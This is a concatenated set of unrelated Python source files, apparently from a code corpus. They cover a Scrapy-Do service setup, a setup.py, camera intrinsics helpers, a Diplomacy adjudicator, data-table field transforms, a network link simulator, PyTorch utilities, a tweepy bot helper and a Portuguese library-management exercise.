#-----------------------------------------------------------------------
try:
controller = Controller(config)
controller.setServiceParent(top_service)
except Exception as e:
log.msg(format="Unable to set up the controller: %(reason)s",
reason=exc_repr(e), logLevel=logging.ERROR)
return top_service
#-----------------------------------------------------------------------
# Set up the web server
#-----------------------------------------------------------------------
try:
web_servers = self._configure_web_server(config, controller)
for web_server in web_servers:
web_server.setServiceParent(top_service)
except Exception as e:
log.msg(format="Scrapy-Do web interface could not have been "
"configured: %(reason)s",
reason=exc_repr(e), logLevel=logging.ERROR)
return top_service
return top_service
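# Usage note (added, hedged): exposed through twistd's IServiceMaker plugin
# mechanism, the service would typically be started with
#   twistd -n scrapy-do
# using the tapname defined above.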
|
python
|
from setuptools import setup, find_packages
setup(
name='sixfab-tool',
version='0.0.3',
author='Ensar Karabudak',
author_email='[email protected]',
description='Sixfab Diagnostic Tool',
license='MIT',
url='https://github.com/sixfab/setup-and-diagnostic-tool.git',
dependency_links = [],
install_requires = [
'prompt_toolkit==1.0.14',
'pyinquirer',
'tqdm',
'yaspin',
'RPi.GPIO',
        'requests',  # originally 'request'; presumably a typo for the HTTP library
'pathlib',
'pyserial'
],
packages=find_packages()
)
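# Install note (added): from the project root, `pip install .` installs the
# tool, and `pip install -e .` gives an editable development install.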
|
python
|
import json
import numpy
import torch
#intrinsics_dict = None
def load_intrinsics_repository(filename, stream='Depth'):
#global intrinsics_dict
with open(filename, 'r') as json_file:
intrinsics_repository = json.load(json_file)
if (stream == 'Depth'):
intrinsics_dict = dict((intrinsics['Device'], \
intrinsics['Depth Intrinsics'][0]['1280x720'])\
for intrinsics in intrinsics_repository)
elif (stream == 'RGB'):
intrinsics_dict = dict((intrinsics['Device'], \
intrinsics['Color Intrinsics'][0]['1280x720'])\
for intrinsics in intrinsics_repository)
return intrinsics_dict
def load_rotation_translation(filename):
#global intrinsics_dict
with open(filename, 'r') as json_file:
intrinsics_repository = json.load(json_file)
intrinsics_dict = dict((intrinsics['Device'], \
{
'R' : numpy.asarray(intrinsics['Color Depth Rotation'], dtype=numpy.float32).reshape([1, 3, 3]),
't' : numpy.asarray(intrinsics['Color Depth Translation'], dtype=numpy.float32).reshape([3, 1])
})\
for intrinsics in intrinsics_repository)
return intrinsics_dict
def get_intrinsics(name, intrinsics_dict, scale=1, data_type=torch.float32):
#global intrinsics_dict
if intrinsics_dict is not None:
intrinsics_data = numpy.array(intrinsics_dict[name])
intrinsics = torch.tensor(intrinsics_data).reshape(3, 3).type(data_type)
intrinsics[0, 0] = intrinsics[0, 0] / scale
intrinsics[0, 2] = intrinsics[0, 2] / scale
intrinsics[1, 1] = intrinsics[1, 1] / scale
intrinsics[1, 2] = intrinsics[1, 2] / scale
intrinsics_inv = intrinsics.inverse()
return intrinsics, intrinsics_inv
raise ValueError("Intrinsics repository is empty")
def get_intrinsics_with_scale(intrinsics_original, scale=1, data_type=torch.float32):
intrinsics = intrinsics_original.clone().detach()
intrinsics[0, 0] = intrinsics[0, 0] / scale
intrinsics[0, 2] = intrinsics[0, 2] / scale
intrinsics[1, 1] = intrinsics[1, 1] / scale
intrinsics[1, 2] = intrinsics[1, 2] / scale
intrinsics_inv = intrinsics.inverse()
return intrinsics, intrinsics_inv
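# --- Usage sketch (not part of the original module) ---
# A minimal, self-contained demonstration of get_intrinsics; the device
# name and 3x3 matrix below are made-up stand-ins for the values that
# load_intrinsics_repository would normally return from a repository file.
if __name__ == '__main__':
    demo_dict = {'demo-device': [[920.0, 0.0, 640.0],
                                 [0.0, 920.0, 360.0],
                                 [0.0, 0.0, 1.0]]}
    # scale=2 halves fx, fy, cx and cy, matching a 2x downsampled image
    # derived from the 1280x720 calibration resolution.
    K, K_inv = get_intrinsics('demo-device', demo_dict, scale=2)
    print(K)
    print(K_inv)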
|
python
|
from adjudicator.base import Season, Phase
from adjudicator.decisions import Outcomes
from adjudicator.paradoxes import find_circular_movements
def process(state):
"""
Processes all orders in a turn.
"""
orders = state.orders
pieces = state.pieces
for order in orders:
order.check_legal()
moves = [o for o in orders if o.is_move]
retreats = [o for o in orders if o.is_retreat]
supports = [o for o in orders if o.is_support]
convoys = [o for o in orders if o.is_convoy]
builds = [o for o in orders if o.is_build]
disbands = [o for o in orders if o.is_disband]
illegal_retreats = [r for r in retreats if r.illegal]
# set illegal retreats to fail.
for r in illegal_retreats:
r.outcome = Outcomes.FAILS
illegal_moves = [m for m in moves if m.illegal]
# set illegal moves to fail.
for m in illegal_moves:
m.outcome = Outcomes.FAILS
unresolved_pieces = [p for p in pieces if p.dislodged_decision == Outcomes.UNRESOLVED]
unresolved_supports = [s for s in supports if s.outcome == Outcomes.UNRESOLVED]
unresolved_convoys = [c for c in convoys if c.piece.dislodged_decision == Outcomes.UNRESOLVED]
while unresolved_convoys:
unresolved_supports = [s for s in supports if s.outcome == Outcomes.UNRESOLVED]
unresolved_moves = [m for m in moves if m.outcome == Outcomes.UNRESOLVED]
for move in unresolved_moves:
move.resolve()
for support in unresolved_supports:
support.resolve()
for piece in unresolved_pieces:
piece.update_dislodged_decision()
for convoy in unresolved_convoys:
convoy.resolve()
# resolve fleet movements
unresolved_convoys = [c for c in convoys if c.outcome == Outcomes.UNRESOLVED]
# refresh after convoys resolved
unresolved_moves = [m for m in moves if m.outcome == Outcomes.UNRESOLVED]
depth = 0
unresolved_retreats = [r for r in retreats if r.outcome == Outcomes.UNRESOLVED]
while unresolved_moves or unresolved_pieces or unresolved_supports or unresolved_retreats:
unresolved_retreats = [r for r in retreats if r.outcome == Outcomes.UNRESOLVED]
for r in unresolved_retreats:
r.resolve()
        if depth == 10:  # after 10 unproductive passes, remaining unresolved moves form circular movements
circular_movements = find_circular_movements(moves)
for li in circular_movements:
for move in li:
move.outcome = Outcomes.SUCCEEDS
for move in [m for m in moves if m.outcome == Outcomes.UNRESOLVED]:
move.resolve()
unresolved_supports = [s for s in supports if s.outcome == Outcomes.UNRESOLVED]
for support in unresolved_supports:
support.resolve()
for piece in unresolved_pieces:
piece.update_dislodged_decision()
unresolved_moves = [m for m in moves if m.outcome == Outcomes.UNRESOLVED]
unresolved_pieces = [p for p in pieces if p.dislodged_decision == Outcomes.UNRESOLVED]
depth += 1
    # Update bounce_occurred on every territory.
for territory in state.territories:
attacks = [o for o in orders if o.is_move and o.target == territory]
bounce_occurred = False
for attack in attacks:
if attack.legal and attack.outcome == Outcomes.FAILS and \
attack.path_decision() == Outcomes.PATH:
bounce_occurred = True
territory.bounce_occurred = bounce_occurred
# Check all dislodged pieces for pieces which can't retreat
dislodged_pieces = [p for p in state.pieces
if p.dislodged_decision == Outcomes.DISLODGED]
for piece in dislodged_pieces:
if not piece.can_retreat():
piece.destroyed = True
piece.destroyed_message = (
'Destroyed because piece cannot retreat to any neighboring '
'territories.'
)
for o in [*builds, *disbands]:
if o.legal:
o.outcome = Outcomes.SUCCEEDS
else:
o.outcome = Outcomes.FAILS
if state.phase == Phase.RETREAT:
for piece in state.pieces:
if piece.retreating and (piece.order.outcome == Outcomes.FAILS):
piece.destroyed = True
piece.destroyed_message = (
'Destroyed because piece must retreat but retreat order failed.'
)
# TODO test
# TODO split into sub function
# Set captured_by for territories if fall orders
if state.season == Season.FALL and state.phase == Phase.ORDER:
# Find all pieces that are not dislodged
non_dislodged_pieces = [p for p in state.pieces if not p.dislodged]
for piece in non_dislodged_pieces:
# Ignore pieces that move successfully
if piece.order.is_move and piece.order.outcome == Outcomes.SUCCEEDS:
continue
            if piece.nation != getattr(piece.territory, 'controlled_by', False):
                if not piece.territory.is_sea:
                    piece.territory.captured_by = piece.nation
# Find all successful move orders
successful_move_orders = [
m for m in state.orders
if m.is_move and m.outcome == Outcomes.SUCCEEDS
]
for move in successful_move_orders:
        if move.piece.nation != getattr(move.target, 'controlled_by', False):
            if not move.target.is_sea:
                move.target.captured_by = move.piece.nation
# Determine the next season, phase and year.
state.next_season, state.next_phase, state.next_year = \
get_next_season_phase_and_year(state)
return state
def get_next_season_phase_and_year(state):
if any(p for p in state.pieces if p.dislodged and not p.destroyed):
return state.season, Phase.RETREAT, state.year
if state.season == Season.SPRING:
return Season.FALL, Phase.ORDER, state.year
    if state.season == Season.FALL and state.phase != Phase.BUILD:
for nation in state.nations:
# TODO check for civil disorder nation
if nation.next_turn_supply_delta != 0:
return state.season, Phase.BUILD, state.year
return Season.SPRING, Phase.ORDER, state.year + 1
|
python
|
import petl
import simpleeval
from ..step import Step
from ..field import Field
class field_add(Step):
code = "field-add"
def __init__(
self,
descriptor=None,
*,
name=None,
value=None,
position=None,
incremental=False,
**options,
):
self.setinitial("name", name)
self.setinitial("value", value)
self.setinitial("position", position)
self.setinitial("incremental", incremental)
# TODO: add options
super().__init__(descriptor)
# TODO: reimplement
self.__name = name
self.__value = value
self.__position = position if not incremental else 1
self.__incremental = incremental
self.__options = options
# Transform
def transform_resource(self, source, target):
index = self.__position - 1 if self.__position else None
if self.__incremental:
target.data = source.to_petl().addrownumbers(field=self.__name)
else:
value = self.__value
if isinstance(value, str) and value.startswith("<formula>"):
formula = value.replace("<formula>", "")
value = lambda row: simpleeval.simple_eval(formula, names=row)
target.data = source.to_petl().addfield(self.__name, value=value, index=index)
field = Field(name=self.__name, **self.__options)
if index is None:
target.schema.add_field(field)
else:
target.schema.fields.insert(index, field)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["name"],
"properties": {
"name": {"type": "string"},
"value": {},
"position": {},
"incremental": {},
},
}
class field_filter(Step):
code = "field-filter"
def __init__(self, descriptor=None, *, names=None):
self.setinitial("names", names)
super().__init__(descriptor)
# TODO: reimplement
self.__names = names
# Transform
def transform_resource(self, source, target):
target.data = source.to_petl().cut(*self.__names)
for name in target.schema.field_names:
if name not in self.__names:
target.schema.remove_field(name)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["names"],
"properties": {
"names": {"type": "array"},
},
}
class field_move(Step):
code = "field-move"
def __init__(self, descriptor=None, *, name=None, position=None):
self.setinitial("name", name)
self.setinitial("position", position)
super().__init__(descriptor)
# TODO: reimplement
self.__name = name
self.__position = position
# Transform
def transform_resource(self, source, target):
target.data = source.to_petl().movefield(self.__name, self.__position - 1)
field = target.schema.remove_field(self.__name)
target.schema.fields.insert(self.__position - 1, field)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["name", "position"],
"properties": {
"name": {"type": "string"},
"position": {"type": "number"},
},
}
class field_remove(Step):
code = "field-remove"
def __init__(self, descriptor=None, *, names=None):
self.setinitial("names", names)
super().__init__(descriptor)
# TODO: reimplement
self.__names = names
# Transform
def transform_resource(self, source, target):
target.data = source.to_petl().cutout(*self.__names)
for name in self.__names:
target.schema.remove_field(name)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["names"],
"properties": {
"names": {"type": "array"},
},
}
class field_split(Step):
code = "field-split"
def __init__(
self,
descriptor=None,
*,
name=None,
to_names=None,
pattern=None,
preserve=False,
):
self.setinitial("name", name)
self.setinitial("toNames", to_names)
self.setinitial("pattern", pattern)
self.setinitial("preserve", preserve)
super().__init__(descriptor)
# TODO: reimplement
self.__name = name
self.__to_names = to_names
self.__pattern = pattern
self.__preserve = preserve
# Transform
def transform_resource(self, source, target):
processor = petl.split
# TODO: implement this check properly
if "(" in self.__pattern:
processor = petl.capture
target.data = processor(
source.to_petl(),
self.__name,
self.__pattern,
self.__to_names,
include_original=self.__preserve,
)
if not self.__preserve:
target.schema.remove_field(self.__name)
for name in self.__to_names:
field = Field(name=name, type="string")
target.schema.add_field(field)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["name", "toNames", "pattern"],
"properties": {
"name": {"type": "string"},
"toNames": {},
"pattern": {},
"preserve": {},
},
}
class field_unpack(Step):
code = "field-unpack"
def __init__(self, descriptor=None, *, name, to_names, preserve=False):
self.setinitial("name", name)
self.setinitial("toNames", to_names)
self.setinitial("preserve", preserve)
super().__init__(descriptor)
# TODO: reimplement
self.__name = name
self.__to_names = to_names
self.__preserve = preserve
# Transform
def transform_resource(self, source, target):
if target.schema.get_field(self.__name).type == "object":
target.data = source.to_petl().unpackdict(
self.__name, self.__to_names, includeoriginal=self.__preserve
)
else:
target.data = source.to_petl().unpack(
self.__name, self.__to_names, include_original=self.__preserve
)
if not self.__preserve:
target.schema.remove_field(self.__name)
for name in self.__to_names:
field = Field(name=name)
target.schema.add_field(field)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["name", "toNames"],
"properties": {
"name": {"type": "string"},
"toNames": {"type": "array"},
"preserve": {},
},
}
# TODO: accept WHERE/PREDICATE clause
class field_update(Step):
code = "field-update"
def __init__(self, descriptor=None, *, name=None, value=None, **options):
self.setinitial("name", name)
self.setinitial("value", value)
# TODO: handle options
super().__init__(descriptor)
# TODO: reimplement
self.__name = name
self.__value = value
self.__options = options
# Transform
def transform_resource(self, source, target):
value = self.__value
if isinstance(value, str) and value.startswith("<formula>"):
formula = value.replace("<formula>", "")
value = lambda val, row: simpleeval.simple_eval(formula, names=row)
if not callable(value):
target.data = source.to_petl().update(self.__name, value)
else:
target.data = source.to_petl().convert(self.__name, value)
field = target.schema.get_field(self.__name)
for name, value in self.__options.items():
setattr(field, name, value)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["name"],
"properties": {
"name": {"type": "string"},
"value": {},
},
}
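# --- Formula convention sketch (not part of the original module) ---
# field_add and field_update both treat a string value that starts with
# "<formula>" as a row-wise expression evaluated by simpleeval. The row
# and expression below are made up purely to illustrate that mechanism.
if __name__ == "__main__":
    value = "<formula>price * quantity"
    formula = value.replace("<formula>", "")
    row = {"price": 2.5, "quantity": 4}
    print(simpleeval.simple_eval(formula, names=row))  # 10.0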
|
python
|
import random
from simulator.constants import BYTES_PER_PACKET
from simulator.trace import Trace
class Link():
def __init__(self, trace: Trace):
self.trace = trace
self.queue_delay = 0.0
self.queue_delay_update_time = 0.0
self.queue_size = self.trace.get_queue_size()
self.pkt_in_queue = 0
    def get_cur_queue_delay(self, event_time):
        # Drain the queue by however many packets the link could have sent
        # since the last update, then compute the delay for what remains.
        self.pkt_in_queue = max(
            0, self.pkt_in_queue -
            self.trace.get_avail_bits2send(self.queue_delay_update_time,
                                           event_time) / 8 / BYTES_PER_PACKET)
        self.queue_delay_update_time = event_time
        cur_queue_delay = self.trace.get_sending_t_usage(
            self.pkt_in_queue * BYTES_PER_PACKET * 8, event_time)
        return cur_queue_delay
    def get_cur_latency(self, event_time):
        q_delay = self.get_cur_queue_delay(event_time)
        # Propagation delay (the trace reports ms) plus current queueing delay.
        return self.trace.get_delay(event_time) / 1000.0 + q_delay
    def packet_enters_link(self, event_time):
        # Random loss according to the trace's loss rate.
        if random.random() < self.trace.get_loss_rate():
            return False
        self.queue_delay = self.get_cur_queue_delay(event_time)
        extra_delay = 1.0 / self.get_bandwidth(event_time)
        # Tail-drop when the queue is full.
        if 1 + self.pkt_in_queue > self.queue_size:
            return False
        self.queue_delay += extra_delay
        self.pkt_in_queue += 1
        return True
def print_debug(self):
print("Link:")
print("Bandwidth: %f" % self.get_bandwidth(0))
print("Delay: %f" % self.trace.get_delay(0))
print("Queue Delay: %f" % self.queue_delay)
print("One Packet Queue Delay: %f" % (1.0 / self.get_bandwidth(0)))
print("Queue size: %d" % self.queue_size)
print("Loss: %f" % self.trace.get_loss_rate())
def reset(self):
self.queue_delay = 0.0
self.queue_delay_update_time = 0.0
self.pkt_in_queue = 0
def get_bandwidth(self, ts):
return self.trace.get_bandwidth(ts) * 1e6 / 8 / BYTES_PER_PACKET
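# --- Usage sketch (not part of the original module) ---
# Link only needs a handful of Trace methods, so a constant-rate stand-in
# is enough to exercise it. _ConstantTrace is hypothetical and only
# approximates the real simulator.trace.Trace interface; the sketch still
# assumes the surrounding simulator package is importable.
class _ConstantTrace:
    BW_MBPS = 10.0  # constant bandwidth in Mbps

    def get_queue_size(self):
        return 50  # queue capacity in packets

    def get_bandwidth(self, ts):
        return self.BW_MBPS

    def get_delay(self, ts):
        return 20.0  # propagation delay in ms

    def get_loss_rate(self):
        return 0.0

    def get_avail_bits2send(self, t0, t1):
        return (t1 - t0) * self.BW_MBPS * 1e6

    def get_sending_t_usage(self, bits, ts):
        return bits / (self.BW_MBPS * 1e6)

if __name__ == '__main__':
    link = Link(_ConstantTrace())
    for t in (0.0, 0.001, 0.002):
        link.packet_enters_link(t)
    print('latency at t=0.01s:', link.get_cur_latency(0.01))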
|
python
|
import numpy as np
import torch
def covariance(m, rowvar=False):
'''Estimate a covariance matrix given data.
Covariance indicates the level to which two variables vary together.
If we examine N-dimensional samples, `X = [x_1, x_2, ... x_N]^T`,
then the covariance matrix element `C_{ij}` is the covariance of
`x_i` and `x_j`. The element `C_{ii}` is the variance of `x_i`.
Args:
m: A 1-D or 2-D array containing multiple variables and observations.
Each row of `m` represents a variable, and each column a single
observation of all those variables.
rowvar: If `rowvar` is True, then each row represents a
variable, with observations in the columns. Otherwise, the
relationship is transposed: each column represents a variable,
while the rows contain observations.
Returns:
The covariance matrix of the variables.
'''
if m.dim() > 2:
raise ValueError('m has more than 2 dimensions')
if m.dim() < 2:
m = m.view(1, -1)
if not rowvar and m.size(0) != 1:
m = m.t()
# m = m.type(torch.double) # uncomment this line if desired
    fact = 1.0 / (m.size(1) - 1)
    # Subtract the per-variable mean without mutating the caller's tensor
    # (m.t() above returns a view, so an in-place update would leak out).
    m = m - torch.mean(m, dim=1, keepdim=True)
    mt = m.t()  # if complex: mt = m.t().conj()
    return fact * m.matmul(mt).squeeze()
def gpu(tensor, gpu=False):
if gpu:
return tensor.cuda()
else:
return tensor
def cpu(tensor):
if tensor.is_cuda:
return tensor.cpu()
else:
return tensor
def minibatch(*tensors, **kwargs):
batch_size = kwargs.get('batch_size', 128)
if len(tensors) == 1:
tensor = tensors[0]
for i in range(0, len(tensor), batch_size):
yield tensor[i:i + batch_size]
else:
for i in range(0, len(tensors[0]), batch_size):
yield tuple(x[i:i + batch_size] for x in tensors)
def shuffle(*arrays, **kwargs):
random_state = kwargs.get('random_state')
if len(set(len(x) for x in arrays)) != 1:
raise ValueError('All inputs to shuffle must have '
'the same length.')
if random_state is None:
random_state = np.random.RandomState()
shuffle_indices = np.arange(len(arrays[0]))
random_state.shuffle(shuffle_indices)
if len(arrays) == 1:
return arrays[0][shuffle_indices]
else:
return tuple(x[shuffle_indices] for x in arrays)
def assert_no_grad(variable):
if variable.requires_grad:
raise ValueError(
"nn criterions don't compute the gradient w.r.t. targets - please "
"mark these variables as volatile or not requiring gradients"
)
def set_seed(seed, cuda=False):
torch.manual_seed(seed)
if cuda:
torch.cuda.manual_seed(seed)
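# --- Usage sketch (not part of the original module) ---
# A small self-contained demonstration of the helpers above; the data is
# made up. With rowvar=False (the default), covariance treats each column
# as a variable and each row as an observation.
if __name__ == '__main__':
    set_seed(0)
    x = torch.randn(100, 3)        # 100 observations of 3 variables
    print(covariance(x).shape)     # -> torch.Size([3, 3])
    a, b = shuffle(np.arange(10), np.arange(10) * 2,
                   random_state=np.random.RandomState(0))
    for batch in minibatch(torch.arange(10), batch_size=4):
        print(batch)               # batches of 4, 4, and 2 elements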
|
python
|
import time

import tweepy
import networkx as nx
class Utils():
"""
Utility functions for rundown.
"""
def __init__(self):
"""Constructor. Nothing to see here."""
self.rundown = self.init_rundown()
def init_rundown(self):
"""
Authenticates API, etc.
Parameters
----------
None
Returns
-------
api
"""
env_vars = {}
with open("../.env", "r") as f:
for line in f:
(key, val) = line.split(": ")
env_vars[key] = val.replace("\n", "")
auth = tweepy.OAuthHandler(
env_vars["API KEY"],
env_vars["API SECRET KEY"])
auth.set_access_token(
env_vars["ACCESS TOKEN"],
env_vars["ACCESS TOKEN SECRET"])
api = tweepy.API(
auth,
wait_on_rate_limit=True,
wait_on_rate_limit_notify=True)
try:
api.verify_credentials()
except:
raise ValueError("Configuration failed.")
return api
def get_mentions(self, last_id = None):
"""
Returns 20 most recent tweets from timeline mentioning @rundown_bot.
Parameters
----------
last_id : `int`
Returns
-------
        mentions : `list`
20 most recent tweets from timeline mentioning @rundown_bot.
"""
if not last_id or last_id == 0:
mentions = self.rundown.mentions_timeline()
else:
mentions = self.rundown.mentions_timeline(since_id = last_id)
mentions.reverse()
return mentions
def get_following(self, user):
"""
Returns a list of users that user_name is following.
Parameters
----------
user : `str`
the user/screen name of the account you want information about
Returns
-------
following : `list`
list of users that user_name is following
"""
        following = []
        # The API client is already constructed with wait_on_rate_limit=True,
        # so the flag is not passed to Cursor here.
        cursor = tweepy.Cursor(self.rundown.friends,
                               screen_name=user,
                               count=200).pages()
        while True:
            try:
                page = next(cursor)
            except StopIteration:
                break
            except tweepy.TweepError:
                # Rate-limit or transient API error: back off and retry.
                time.sleep(60)
                continue
            following.extend(page)
        following = [f.screen_name for f in following]
        return following
def does_follow(self, user1, user2):
"""
Returns True if user1 follows user2.
Parameters
----------
user1 : `str`
the user/screen name of one account you want information about
user2 : `str`
the user/screen name of the other account you want information about
Returns
-------
val : `bool`
if user1 follows user2
"""
following = self.get_following(user1)
return user2 in following
def build_graph_between(self, user1, user2, max_depth = 5):
"""
DON'T USE THIS (RATE LIMIT)
Builds a minimal graph of user-following between user1 and user2.
Parameters
----------
user1 : `str`
the user/screen name of one account you want information about
user2 : `str`
the user/screen name of the other account you want information about
max_depth : `int`
maximum search depth for tree construction
Returns
-------
G : `networkx Graph`
"""
G = nx.Graph()
depth = 1
G.add_nodes_from([user1, user2])
following1 = self.get_following(user1)
following2 = self.get_following(user2)
for f in following1:
G.add_node(f)
G.add_edge(user1, f)
for f in following2:
G.add_node(f)
G.add_edge(user2, f)
new_members = following1 + following2
        if nx.has_path(G, user1, user2):
return G
while depth < max_depth:
new_members_new = []
for f in new_members:
following = self.get_following(f) #users f is following
for new_f in following: #each user f is following
if new_f not in G:
#if f is following a user not in G, add user to G
G.add_node(new_f)
new_members_new.append(new_f)
G.add_edge(f, new_f)
            if nx.has_path(G, user1, user2):
return G
depth += 1
new_members = new_members_new
        if nx.has_path(G, user1, user2):
            return G
        raise ValueError("%s and %s not connected with search depth of %d."
                         % (user1, user2, max_depth))
def get_user_distance(self, user1, user2, max_depth = 5):
"""
DON'T USE THIS (RATE LIMIT)
        Uses the A* algorithm to compute the distance between users in the following graph.
Parameters
----------
user1 : `str`
the user/screen name of one account you want information about
user2 : `str`
the user/screen name of the other account you want information about
max_depth : `int`
maximum search depth for tree construction
Returns
-------
val : `int`
following distance between user1 and user2
"""
        try:
            G = self.build_graph_between(user1, user2, max_depth)
        except ValueError:
            raise ValueError("%s and %s not connected with search depth of %d."
                             % (user1, user2, max_depth))
length = nx.astar_path_length(G, user1, user2)
return length
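# --- Usage sketch (not part of the original module) ---
# Utils reads credentials from ../.env (lines like "API KEY: ..."), so the
# calls below are left commented out; they only illustrate the intended
# flow, and the screen names are hypothetical.
#
# utils = Utils()
# for mention in utils.get_mentions():
#     print(mention.user.screen_name, mention.text)
# print(utils.does_follow('alice', 'bob'))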
|
python
|
'''Create the classes needed for a library management system. Librarians
fill in the system with each book's title, authors, year, publisher,
edition and volume. The library will also have a search system (separate
software), so the typical search attributes (title, author, ...) must be
accessible.'''
class Livro():
def __init__(self, titulo: str, autores: str, ano: str, editora: str, edicao=1, volume=1):
self.__titulo = titulo
self.__autores = autores
self.__ano = ano
self.__editora = editora
self.__edicao = edicao
self.__volume = volume
@property
def titulo(self):
return self.__titulo
@property
def autores(self):
return self.__autores
@property
def ano(self):
return self.__ano
@property
def editora(self):
return self.__editora
@property
def edicao(self):
return self.__edicao
@property
def volume(self):
return self.__volume
class Biblioteca():
def __init__(self, livros: list):
self.__livros = livros
@property
def livros(self):
return self.__livros
def adicionar_livro(self, livro: Livro):
self.livros.append(livro)
    def exibir_livros(self):
        for c, livro in enumerate(self.livros, start=1):
            print(f'{c}. {livro.titulo} ({livro.ano}), by {livro.autores}, '
                  f'publisher {livro.editora}, ed. {livro.edicao}, vol. {livro.volume}')
def main():
livro1 = Livro('Admirável mundo novo', 'Aldous Huxley', '1932', 'Biblioteca Azul')
livro2 = Livro('Morte na Mesopotâmia', 'Agatha Christie', '1936', 'Arqueiro', '19')
livro3 = Livro('Life, the Universe and Everything', 'Douglas Adams', '1982', 'Del Rey', '1', '3')
livro4 = Livro('Cidades de Papel', 'John Green', '2008', 'Intrinseca')
    biblioteca = Biblioteca([livro1, livro2, livro3])
    biblioteca.adicionar_livro(livro4)
    biblioteca.exibir_livros()
if __name__ == '__main__':
    main()
|